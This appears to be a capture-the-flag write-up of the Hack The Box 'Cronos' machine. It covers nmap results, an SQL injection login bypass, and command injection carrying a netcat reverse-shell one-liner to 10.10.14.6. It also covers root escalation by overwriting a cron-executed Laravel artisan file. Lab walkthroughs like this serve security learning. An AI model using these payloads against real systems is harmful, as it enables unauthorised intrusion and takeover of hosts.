I"<h1 id="nmap-scan">Nmap scan</h1>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 <span class="o">(</span>RSA<span class="o">)</span>
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 <span class="o">(</span>ED25519<span class="o">)</span>
53/tcp open  domain  ISC BIND 9.10.3-P4 <span class="o">(</span>Ubuntu Linux<span class="o">)</span>
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Apache2 Ubuntu Default Page: It works
</code></pre></div></div>
<h1 id="pwning-user">pwning user</h1>
<p>The presence of port 53 being open hinted to me that virtual host routing may be involved. Edit /etc/hosts file to add <code class="language-plaintext highlighter-rouge">cronos.htb</code> for a site to resolve.
Resolving the host also returns ‘admin.cronos.htb’ so add that too.</p>

<p>The admin subdomain automatically stood out so i went to the page and found a login form. Basic sql injection (‘OR 1=1# and any password) bypasses the login and allows us entry into the page. 
“Net Tool v0.1” allows us to input code to execute but we can inject our own by adding a semicolon after the expected address. Inject a basic bash reverse shell and run a listener to recieve a shell.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.6 1234 &gt;/tmp/f 
</code></pre></div></div>
<p>We can now grab user.txt</p>

<h1 id="gaining-root">Gaining root</h1>
<p>As the box name suggests this proceedure may involve a cronjob. Doing a check for jobs returns the following;</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /etc/crontab
<span class="c"># /etc/crontab: system-wide crontab</span>
<span class="c"># Unlike any other crontab you don't have to run the `crontab'</span>
<span class="c"># command to install the new version when you edit this file</span>
<span class="c"># and files in /etc/cron.d. These files also have username fields,</span>
<span class="c"># that none of the other crontabs do.</span>

<span class="nv">SHELL</span><span class="o">=</span>/bin/sh
<span class="nv">PATH</span><span class="o">=</span>/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

<span class="c"># m h dom mon dow user	command</span>
17 <span class="k">*</span>	<span class="k">*</span> <span class="k">*</span> <span class="k">*</span>	root    <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.hourly
25 6	<span class="k">*</span> <span class="k">*</span> <span class="k">*</span>	root	<span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.daily <span class="o">)</span>
47 6	<span class="k">*</span> <span class="k">*</span> 7	root	<span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.weekly <span class="o">)</span>
52 6	1 <span class="k">*</span> <span class="k">*</span>	root	<span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.monthly <span class="o">)</span>
<span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>	root	php /var/www/laravel/artisan schedule:run <span class="o">&gt;&gt;</span> /dev/null 2&gt;&amp;1
</code></pre></div></div>

<p>From this it appears that root is executing the file ‘artisan’ on a regular cron. If we replace the file in this location with one under the same name it should execute as root. Placing a shell here executes when the cron triggers and gives us a shell as root.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">listening on [any] 9150 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.13] 44730
</span><span class="gp">Linux cronos 4.4.0-72-generic #</span>93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
<span class="go"> 10:57:01 up 3 days,  1:20,  0 users,  load average: 0.02, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
</span></code></pre></div></div>
<p>Can now grab the root flag and cleanup.</p>

:ET